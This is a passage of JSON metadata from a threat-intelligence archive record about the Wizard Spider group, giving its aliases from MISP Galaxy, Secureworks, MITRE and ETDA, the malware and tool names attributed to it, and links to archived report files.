			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434894,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.pdf",
		"text": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.txt",
		"img": "https://archive.orkl.eu/2038a0eba536a55962c210b05d6ef146bd28ce28.jpg"
	}
}